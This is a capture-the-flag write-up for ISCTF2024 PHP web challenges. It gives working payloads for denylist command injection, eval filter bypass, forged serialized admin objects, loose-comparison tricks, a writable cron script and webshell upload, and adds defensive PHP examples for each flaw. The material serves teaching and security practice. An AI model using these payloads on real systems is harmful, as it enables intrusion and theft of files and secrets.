ISCTF2024:

1z_php:

```php
<?php
if (isset($_POST['J'])) {
    $call = $_POST['J'];
    $dangerous_commands = ['cat', 'tac', 'head', 'nl', 'more', 'less', 'tail', 'vi', 'sed', 'od'];
    foreach ($dangerous_commands as $command) {
        if (preg_match("/$command/i", $call)) {
            die("这些个危险函数可不兴使啊");
        }
    }
    system($call);
}
?>
```

Send `J=ls /` to list the root directory, then `J=uniq /f14g` to print the flag file: `uniq` is not on the denylist.

25时晓山瑞希生日会:

The page says you are not a real client: only requests from the Project Sekai client may join the birthday party.

After changing the User-Agent header, the response becomes "you don't seem to have come at the right time...". So the time must be forged as well: set the date header to `Date: Thu, 27 Aug 2024 05:00:00 GMT`.

ezrce:

```php
<?php
if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    if (preg_match("/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&\>\<]|eval|system|exec|popen|shell_exec/i", $cmd)) {
        die("Blocked by security filter!");
    } else {
        eval($cmd);
    }
} else {
    highlight_file(__FILE__);
}
```

`cmd=var_dump(scandir('/'));` lists the root directory and reveals the flag file.

Method 1:

`cmd=include$_GET[1];&1=pHp://FilTer/convert.base64-encode/resource=/flag`, then base64-decode the output. The filter only inspects `cmd`, not the second parameter.

Method 2:

`?cmd=var_dump(file_get_contents($_GET['1']));&1=/flag`

Method 3:

Bitwise-NOT (`~`) bypass.

Method 4:

`cmd=passthru('cd%09..;cd%09..;uniq%09/?l*');`
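Both 1z_php and ezrce fail for the same reason: a denylist can only name the bad words its author thought of (`uniq` is not on the 1z_php list, and the ezrce regex never looks at `$_GET[1]`). The block below is an added example, not code from the write-up or the challenges. It replays the 1z_php filter against the write-up's own inputs and then shows the allowlist shape that removes the guessing game: the client picks an action name, never a command, and its argument is confined to one directory and quoted. The function names and the `./public` directory are hypothetical. For the ezrce case there is no filter to write: `eval()` of client input has to go.

```php
<?php
// Added example (not part of the write-up): the 1z_php denylist next to an
// allowlist. Function names and the ./public directory are hypothetical.

// Denylist from 1z_php: reject if any listed word occurs anywhere in the input.
function denylist_allows(string $call): bool
{
    $dangerous = ['cat', 'tac', 'head', 'nl', 'more', 'less', 'tail', 'vi', 'sed', 'od'];
    foreach ($dangerous as $word) {
        if (preg_match("/$word/i", $call)) {
            return false;
        }
    }
    return true; // anything not listed, e.g. uniq, goes straight to system()
}

// Allowlist: the client supplies an action name and a file argument only.
// The action maps to a fixed program; the argument is confined to one
// directory and quoted with escapeshellarg().
const ALLOWED_ACTIONS = [
    'list'  => 'ls -l --',
    'lines' => 'wc -l --',
];

function run_allowlisted(string $action, string $arg): ?string
{
    if (!array_key_exists($action, ALLOWED_ACTIONS)) {
        return null; // unknown action: refuse rather than try to sanitize
    }
    $base = realpath(__DIR__ . '/public');
    $path = $base === false ? false : realpath($base . '/' . $arg);
    // realpath() resolves ../ and symlinks; the prefix test keeps us inside $base.
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return shell_exec(ALLOWED_ACTIONS[$action] . ' ' . escapeshellarg($path));
}

// The write-up's payloads, run through the denylist.
foreach (['ls /', 'cat /f14g', 'uniq /f14g'] as $call) {
    printf("%-12s -> %s\n", $call, denylist_allows($call) ? 'passes filter' : 'blocked');
}
```

The loop shows that `cat /f14g` is stopped while `uniq /f14g` passes, which is exactly the write-up's solve; `run_allowlisted()` has no equivalent gap because the only strings reaching the shell are the fixed program and a quoted, directory-confined path.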

ezserialize:

```php
<?php
error_reporting(0);

class Flag {
    private $flag;
    public function __construct() {
        $this->flag = file_get_contents('/flag');
    }
    public function getFlag() {
        return $this->flag;
    }
    public function __toString() {
        return "You can't directly access the flag!";
    }
}

class User {
    public $username;
    public $isAdmin = false;
    public function __construct($username) {
        $this->username = $username;
    }
    public function __wakeup() {
        if ($this->isAdmin) {
            echo "Welcome, admin! Here's your flag: " . (new Flag())->getFlag();
        } else {
            echo "Hello, " . htmlspecialchars($this->username) . "!";
        }
    }
}

if (isset($_GET['data'])) {
    $data = $_GET['data'];
    $object = unserialize($data);
    if ($object instanceof User) {
        echo $object;
    } else {
        echo "Invalid object!";
    }
} else {
    highlight_file(__FILE__);
}
?>
```

Change `false` to `true`, set any username, and serialize the object to get the `data` payload:

```php
<?php
class Flag {
    private $flag;
}

class User {
    public $username;
    public $isAdmin = true;
}

$user = new User();
$user->username = "1";
echo serialize($user);
```
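The root cause in ezserialize is that `__wakeup()` does privileged work during `unserialize()` of bytes the client controls, and the privilege flag itself travels in those bytes. The block below is an added example, not code from the write-up or the challenge; its class and function names are hypothetical. It shows two fixes: keeping `unserialize()` but forbidding object instantiation, so no magic method ever runs, and (preferably) exchanging plain JSON with explicit field validation while taking the admin decision from server-side session state.

```php
<?php
// Added example (not part of the write-up): keeping the ezserialize pattern
// from granting admin on the strength of client-supplied data.
// Class and function names are hypothetical.

class User
{
    public $username;
    public $isAdmin = false;

    public function __wakeup()
    {
        // The challenge does privileged work here. A magic method that runs
        // during unserialize() of attacker-controlled bytes must not.
    }
}

// Option 1: if unserialize() has to stay, forbid object instantiation.
// Serialized objects then come back as __PHP_Incomplete_Class and no
// __wakeup() is ever invoked; only plain arrays are accepted here.
function parse_untrusted_serialized(string $data): ?array
{
    $value = @unserialize($data, ['allowed_classes' => false]);
    return is_array($value) ? $value : null;
}

// Option 2 (preferred): exchange plain data (JSON), validate each field, and
// take the privilege decision from server-side session state, not the payload.
function load_user_from_json(string $json, array $session): ?User
{
    $fields = json_decode($json, true);
    if (!is_array($fields) || !isset($fields['username']) || !is_string($fields['username'])) {
        return null;
    }
    $user = new User();
    $user->username = $fields['username'];
    $user->isAdmin = !empty($session['is_admin']); // the client's isAdmin is ignored
    return $user;
}

// The payload shape the write-up's generator produces (constructed here for the demo).
$payload = 'O:4:"User":2:{s:8:"username";s:1:"1";s:7:"isAdmin";b:1;}';
var_dump(parse_untrusted_serialized($payload)); // an object, so it is rejected
var_dump(@unserialize($payload, ['allowed_classes' => false]) instanceof __PHP_Incomplete_Class);

// Client claims admin in the JSON; the session says otherwise and wins.
$user = load_user_from_json('{"username":"1","isAdmin":true}', ['is_admin' => false]);
var_dump($user !== null ? $user->isAdmin : null);
```

With `allowed_classes => false` the `User` object in the payload is not instantiated, so the `__wakeup()` branch that reads `/flag` never runs; with the JSON path the `isAdmin` field is simply not read from the client at all.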

小蓝鲨的临时存储室:

Uploading works directly, but `/flag` cannot be opened: insufficient permissions.

`/down_file.sh` is found to contain: `find /var/www/localhost/htdocs/uploads/ -type f -name "*.php" -exec rm -f {} \;`

The script is writable, so it can be changed to `/flag > /tmp/1.txt`; wait a moment for it to run again and the flag is there.

小蓝鲨的冒险:

```php
<?php
$a = "isctf2024";
$b = $_GET["b"];
@parse_str($b);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
    $num = $_POST["num"];
    if ($num == 2024) {
        die("QAQ");
    }
    if (preg_match("/[a-z]/i", $num)) {
        die("no no no!");
    }
    if (intval($num, 0) == 2024) {
        if (isset($_GET['which'])) {
            $which = $_GET['which'];
            switch ($which) {
                case 0:
                    print('QAQ');
                case 1:
                case 2:
                    require_once $which . '.php';
                    echo $flag;
                    break;
                default:
                    echo GWF_HTML::error('PHP-0817', 'Hacker NoNoNo!', false);
                    break;
            }
        }
    }
}
```

First the md5 bypass: `b=a[0]=240610708`. `parse_str($b)` overwrites `$a`, and both `md5('240610708')` and `md5('QNKCDZO')` start with `0e`, so `==` compares them as the number zero.

Then the `intval` bypass: `num=2024.1`, or an octal form of 2024.

Then, in the switch:

```php
if (isset($_GET['which'])) {
    $which = $_GET['which'];
    switch ($which) {
        case 0:
            print('QAQ');
        case 1:
        case 2:
            require_once $which . '.php';
            echo $flag;
            break;
        default:
            echo GWF_HTML::error('PHP-0817', 'Hacker NoNoNo!', false);
            break;
    }
}
```

Pass `which=flag`: `switch` compares with `==`, and on PHP 7 the non-numeric string `"flag"` equals `0`, so `case 0` matches and falls through to the `require_once`, which includes `flag.php` and prints the flag.
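All three gates in this challenge are PHP loose comparisons. The block below is an added example, not code from the write-up or the challenge: it evaluates each gate with the write-up's own inputs and places a strict counterpart beside it (`hash_equals()`, a single canonical integer parse, exact string matching). Function names are hypothetical, and the octal value `03750` is a constructed sample, since the write-up only says "octal".

```php
<?php
// Added example (not part of the write-up): the three loose comparisons in
// this challenge beside strict versions. Function names are hypothetical;
// 03750 is my own octal sample for 2024.

// 1. md5 magic hash: both digests begin with "0e" followed by digits, so ==
//    treats them as numeric strings equal to zero. hash_equals() compares bytes.
function md5_loose_equal(string $a, string $b): bool
{
    return md5($a) == md5($b);
}
function md5_strict_equal(string $a, string $b): bool
{
    return hash_equals(md5($a), md5($b));
}

// 2. "$num == 2024" and "intval($num, 0) == 2024" parse the string differently
//    (numeric-string float vs. base-0 integer), so one input can fail the
//    first gate and pass the second.
function num_loose(string $num): bool
{
    return $num != 2024 && intval($num, 0) == 2024;
}
// Parse once, canonically (plain decimal digits only), and reuse that integer.
function canonical_int(string $num): ?int
{
    return preg_match('/^(0|[1-9][0-9]*)$/', $num) === 1 ? (int) $num : null;
}
function num_strict(string $num): bool
{
    $n = canonical_int($num);
    // Both gates now see the same integer, so "not 2024 and is 2024" never holds.
    return $n !== null && $n !== 2024 && $n === 2024;
}

// 3. switch compares with ==. On PHP 7, "flag" == 0 is true, so case 0 matches
//    and falls through to the require_once. PHP 8 changed string/int comparison.
function which_loose(string $which): string
{
    $trace = [];
    switch ($which) {
        case 0:
            $trace[] = 'case 0'; // no break, exactly as in the challenge
        case 1:
        case 2:
            $trace[] = 'require_once';
            break;
        default:
            $trace[] = 'default';
            break;
    }
    return implode(' -> ', $trace);
}
function which_strict(string $which): string
{
    // Exact-string match against the known file names only.
    return in_array($which, ['1', '2'], true) ? 'require_once' : 'default';
}

printf("md5 ==      : %s\n", var_export(md5_loose_equal('240610708', 'QNKCDZO'), true));
printf("hash_equals : %s\n", var_export(md5_strict_equal('240610708', 'QNKCDZO'), true));
foreach (['2024', '2024.1', '03750'] as $n) {
    printf("num=%-7s loose: %-5s strict: %s\n", $n,
        var_export(num_loose($n), true), var_export(num_strict($n), true));
}
printf("which=flag on PHP %s: loose: %s | strict: %s\n",
    PHP_VERSION, which_loose('flag'), which_strict('flag'));
```

Run it under PHP 7 and again under PHP 8 to see the third gate change behaviour while the first two do not; the strict versions give the same answer on both.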

小蓝鲨的秘密:

Opening the page gives a 302 redirect; capture the response with a proxy and the flag is in it.

UP!UPloader:

File upload: upload a small webshell. Then `include.php` turns out to expose file source code; read `upload.php` first.

Files are uploaded to the `./uploads/` directory and renamed to the md5 hash plus the original extension; construct the path from that logic and access it.

Then connect with AntSword (蚁剑).

If the flag cannot be found, run commands on the site:

`cmd=system('env');`

`cmd=phpinfo();` works as well; either one reveals the flag.
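UP!UPloader was solvable because uploaded PHP stayed executable, the stored name was derivable from an md5, and `include.php` would read arbitrary files. The block below is an added example, not code from the write-up or the challenge: an upload handler and a matching download endpoint that close those three paths. The storage directory, the type allowlist and the function names are hypothetical.

```php
<?php
// Added example (not part of the write-up): an upload handler that closes the
// three things UP!UPloader relied on (executable uploads, a derivable file
// name, and a source-disclosing include). Paths and names are hypothetical.

const UPLOAD_DIR = __DIR__ . '/../storage/uploads'; // outside the web root
const ALLOWED_TYPES = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'gif' => 'image/gif'];

// Returns the opaque stored name, or null if anything is off.
function store_upload(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Extension allowlist on the client name; it is never used as the type.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return null;
    }
    // The sniffed content type must agree with the extension.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED_TYPES[$ext]) {
        return null;
    }
    // Unpredictable name: an md5-derived name is only as secret as its input,
    // random_bytes() has no input to guess.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0750, true)) {
        return null;
    }
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0640); // never executable
    return $name;
}

// Serve by opaque name only: no include(), no client-controlled path, a fixed
// Content-Type, and the file is streamed as bytes, never interpreted as PHP.
function serve_upload(string $name): bool
{
    if (!preg_match('/^[0-9a-f]{32}\.(png|jpg|gif)$/', $name)) {
        return false; // rejects ../, stream wrappers, and any name we did not issue
    }
    $path = UPLOAD_DIR . '/' . $name;
    if (!is_file($path)) {
        return false;
    }
    $ext = pathinfo($name, PATHINFO_EXTENSION);
    header('Content-Type: ' . ALLOWED_TYPES[$ext]);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);
    return true;
}

if (isset($_FILES['file'])) {
    $stored = store_upload($_FILES['file']);
    echo $stored === null ? 'upload rejected' : 'stored as ' . $stored;
} elseif (isset($_GET['name'])) {
    if (!serve_upload((string) $_GET['name'])) {
        http_response_code(404);
    }
}
```

The two halves are deliberately asymmetric: `store_upload()` decides the name and the type, and `serve_upload()` accepts only names of the exact shape it issues, so there is no request parameter from which a path, a `php://` wrapper or a source file can be reached.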